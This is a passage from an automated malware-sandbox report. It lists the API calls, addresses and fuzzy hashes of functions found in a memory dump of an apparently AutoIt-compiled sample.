Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: ded6533a3bff734771643563edccb9f9786fc0c9e3f49d13db6b787343bad965
Instruction ID: 1693045bce21e30e942906fdce7c46700dfc1882b864b0df7a739f3590f02586
Opcode Fuzzy Hash: ded6533a3bff734771643563edccb9f9786fc0c9e3f49d13db6b787343bad965
Instruction Fuzzy Hash: 6621CD72220206EBEF104F74EC84EBB37BDEB59364F208618F958D2590D771DCA59B61

Function 00204D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00204D1E,002128E9,?,00204CBE,002128E9,002A88B8,0000000C,00204E15,002128E9,00000002), ref: 00204D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00204DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00204D1E,002128E9,?,00204CBE,002128E9,002A88B8,0000000C,00204E15,002128E9,00000002,00000000), ref: 00204DC3

Strings

mscoree.dll, xrefs: 00204D86
CorExitProcess, xrefs: 00204D98

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fd3a42cce834fd329c3905e795017466f2f6c751ac9a7044a502a448fb06bcfe
Instruction ID: 1c9795e89308c508fb70fe9f78414f51f3a513965a82a77b421135931b9d7990
Opcode Fuzzy Hash: fd3a42cce834fd329c3905e795017466f2f6c751ac9a7044a502a448fb06bcfe
Instruction Fuzzy Hash: 3BF0AF74A10309BBDB15AFA0EC4DBADBBB4EF04711F1040A8F909A22A1CB305A90CBD0

Function 001E4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001E4EAE
FreeLibrary.KERNEL32(00000000,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 001E4EA8
kernel32.dll, xrefs: 001E4E94

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: b871ca40c641240fefcd07e6937535791e39dc8b6fd0a91954be2cf989e97701
Instruction ID: 0bb6d19b53c21807b016a08ea8554dc0bf334f156269c682a454553e7b73a8f0
Opcode Fuzzy Hash: b871ca40c641240fefcd07e6937535791e39dc8b6fd0a91954be2cf989e97701
Instruction Fuzzy Hash: F0E0CD35E019625BD2351B367C1CB5FA654AFC2F62B550129FD0DD2100DF64CD4185B4

Function 001E4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001E4E74
FreeLibrary.KERNEL32(00000000,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 001E4E6E
kernel32.dll, xrefs: 001E4E5B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 8a03b40a47a054c1eac7a4b8f38fb1078c8ecceac9d51e75a9c2756acd27e115
Instruction ID: 40c7b767b20d2e0bbe622d5491b5e81970dd5d8e14b159b351b7556fda02ab65
Opcode Fuzzy Hash: 8a03b40a47a054c1eac7a4b8f38fb1078c8ecceac9d51e75a9c2756acd27e115
Instruction Fuzzy Hash: F7D0C231902A615766221B367C0CD8FAA18AF8AB113590128B80CA2110CF24CD41C5E0

Function 0026A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0026A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0026A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0026A468
CloseHandle.KERNEL32(?), ref: 0026A63D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: cedfaa77d65355bce1bb2083d82dfdd8c8ef4798ecaf2707703ae606b04c2eea
Instruction ID: 51178ac25867babbcd5fb00a0a3ba0703d0fa32368f267b45819950f8f8a4cdb
Opcode Fuzzy Hash: cedfaa77d65355bce1bb2083d82dfdd8c8ef4798ecaf2707703ae606b04c2eea
Instruction Fuzzy Hash: DFA1C0716047019FD720DF28D886F2AB7E5AF98714F14885DF55A9B3D2DBB0EC418B82

Function 0021BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00283700), ref: 0021BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002B121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0021BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002B1270,000000FF,?,0000003F,00000000,?), ref: 0021BC36
_free.LIBCMT ref: 0021BB7F

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000,00000000), ref: 002129F0

_free.LIBCMT ref: 0021BD4B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 2e906cc5803d071bce40931b7c7002640ea9b58cdc3d10d2e60079d6800bb1ba
Instruction ID: 80c6b3062db6d67072bf2c628772e885009a3ae645be3f1c9442a9257615f200
Opcode Fuzzy Hash: 2e906cc5803d071bce40931b7c7002640ea9b58cdc3d10d2e60079d6800bb1ba
Instruction Fuzzy Hash: AD511A71910219EFCB15EF65EC859EEB7F8EF60310B6002AAE424D7291DB305EF08B90

Function 0024E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0024CF22,?), ref: 0024DDFD

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0024CF22,?), ref: 0024DE16

Part of subcall function 0024E199: GetFileAttributesW.KERNEL32(?,0024CF95), ref: 0024E19A

lstrcmpiW.KERNEL32(?,?), ref: 0024E473
MoveFileW.KERNEL32(?,?), ref: 0024E4AC
_wcslen.LIBCMT ref: 0024E5EB
_wcslen.LIBCMT ref: 0024E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0024E650

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: bdfb672e6a1aa895b55423429248e64a5b4172882aeb60031cbddc8ebd9039a2
Instruction ID: 4db1a9b71bffe254ac68cf6d85f0994dcc329181e0f4ef443f6fa91542fb20dd
Opcode Fuzzy Hash: bdfb672e6a1aa895b55423429248e64a5b4172882aeb60031cbddc8ebd9039a2
Instruction Fuzzy Hash: D351B7B24183859BDB28EFA0DC819DF73DCAF94300F00491EF589D3191EF74A5988B56

Function 0026B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0026BB63
RegCloseKey.ADVAPI32(?,?), ref: 0026BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0026BBB3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 33ae96b976056b93da93921ceb1b5597cb6de0039e955ba1ece5ce88c0017c7c
Instruction ID: a76ad67e30069fe70515ff60a9684e8ddef1fc12386cb6679624b19f1b38bc30
Opcode Fuzzy Hash: 33ae96b976056b93da93921ceb1b5597cb6de0039e955ba1ece5ce88c0017c7c
Instruction Fuzzy Hash: C261C331218241EFD715DF64C494E2ABBE5FF84308F54895CF4998B2A2DB31ED85CB92

Function 00248BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00248BCD
VariantClear.OLEAUT32 ref: 00248C3E
VariantClear.OLEAUT32 ref: 00248C9D
VariantClear.OLEAUT32(?), ref: 00248D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00248D3B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 2fc3cbcad6cd1ae1022855551645d79239fb6c4180413954ce438073155edd1e
Instruction ID: 64abf24ce24796e6d390738cd75facfbea772169c605c01928295f226d1b3f0f
Opcode Fuzzy Hash: 2fc3cbcad6cd1ae1022855551645d79239fb6c4180413954ce438073155edd1e
Instruction Fuzzy Hash: 85518D71A1121ADFCB14CF28C894AAAB7F4FF89314B118559E909DB350E730E911CF90

Function 00258AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00258BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00258BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00258C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00258C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00258C5F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 213b91de0b2093c3472244bfa9324348e7faa7927c60e639275fd79ee2f87445
Instruction ID: 07ef91a5aa33199d95349df5b1b526be100b0f059d3fdf11b3b686d405a592f3
Opcode Fuzzy Hash: 213b91de0b2093c3472244bfa9324348e7faa7927c60e639275fd79ee2f87445
Instruction Fuzzy Hash: B7517A35A00619AFDB04DF65D880E6EBBF5FF48314F088059E849AB3A2CB71ED51CB90

Function 00268EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00268F40
GetProcAddress.KERNEL32(00000000,?), ref: 00268FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00268FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00269032
FreeLibrary.KERNEL32(00000000), ref: 00269052

Part of subcall function 001FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00251043,?,7644E610), ref: 001FF6E6
Part of subcall function 001FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0023FA64,00000000,00000000,?,?,00251043,?,7644E610,?,0023FA64), ref: 001FF70D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 394ac8c437b10af6d05d62e0482d212be39ed2f7b8427ae7f31f98454ec78109
Instruction ID: b3c63e4e98d2e6a21b7a30076347484a39101ec483842fb619e40388a9aad1db
Opcode Fuzzy Hash: 394ac8c437b10af6d05d62e0482d212be39ed2f7b8427ae7f31f98454ec78109
Instruction Fuzzy Hash: 3F515934614645DFCB10DF68C4848ADBBF1FF59324B5481A8E80AAB762DB31EDC6CB90

Function 00276B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00276C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00276C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00276C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0025AB79,00000000,00000000), ref: 00276C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00276CC7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 2aa34fe1dcce5a67d62f05abce7b9367d96316749191500b11aa43431abc7fc0
Instruction ID: f168466efbb62c4508487b639e8f06919ffb83b8fd8d3efe71a78ae749088191
Opcode Fuzzy Hash: 2aa34fe1dcce5a67d62f05abce7b9367d96316749191500b11aa43431abc7fc0
Instruction Fuzzy Hash: F541D435624505AFD725CF38CC5CFAA7BA5EB0A360F14826DF89DA72E0C371AD61CA40

Function 00212051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002120C3
_free.LIBCMT ref: 002120E3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 86c38bd80cb9b34b8d2d310e064c2e0f21775af9392d3305d07e93016330d4e1
Instruction ID: 2cc3d514b043018f5994da5d6a10c3dfdd5c4d623db97a125722c36c79faf3bb
Opcode Fuzzy Hash: 86c38bd80cb9b34b8d2d310e064c2e0f21775af9392d3305d07e93016330d4e1
Instruction Fuzzy Hash: DA41D432A10204EFCB24DF78C881A9DB7E5EFA9314F254568F615EB352DB31AD65CB80

Function 001F912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001F9141
ScreenToClient.USER32(00000000,?), ref: 001F915E
GetAsyncKeyState.USER32(00000001), ref: 001F9183
GetAsyncKeyState.USER32(00000002), ref: 001F919D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 19b0437bd5cfe12251d78c4e5fcb567ea67dfcbbcbc40df0782f8f382d4cabb1
Instruction ID: 7723f5ced676fffc7ff271875fee0d1030bc54b261d81e406807b07150583153
Opcode Fuzzy Hash: 19b0437bd5cfe12251d78c4e5fcb567ea67dfcbbcbc40df0782f8f382d4cabb1
Instruction Fuzzy Hash: FD41517191851BEBDF19AF64C848BFEB774FB05334F20822AE569A2290C7705954CF91

Function 00253874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002538CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00253922
TranslateMessage.USER32(?), ref: 0025394B
DispatchMessageW.USER32(?), ref: 00253955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00253966

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 5ff73841f1c207faaefd27bf1583a3402bc995f972affb1477a9eebe794702d6
Instruction ID: 5d151c92b56dd1c046391b1348ae73744d98ea6d4e24af78e32465fbfda94d0b
Opcode Fuzzy Hash: 5ff73841f1c207faaefd27bf1583a3402bc995f972affb1477a9eebe794702d6
Instruction Fuzzy Hash: 2931FBB0528347DEEB35CF34A85DBB637E8AB01382F54155DE856C2090E7F096ACCB15

Function 0025CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0025CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0025C21E,00000000), ref: 0025CFF2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 9b904878c10a0cb3560ec5b3b3be618ebbd58f608990b9601893cc1d5a105000
Instruction ID: 8e7efe7f8c836aba3a72592a5b1e4b1a7251cb3be5f7af312dafde1faa519a50
Opcode Fuzzy Hash: 9b904878c10a0cb3560ec5b3b3be618ebbd58f608990b9601893cc1d5a105000
Instruction Fuzzy Hash: 7231A071610306EFDB24DFA5D884AABBBF9EF10312B20402FF90AD2511EB30AD55DB64

Function 00241901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00241915
PostMessageW.USER32(00000001,00000201,00000001), ref: 002419C1
Sleep.KERNEL32(00000000,?,?,?), ref: 002419C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 002419DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002419E2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
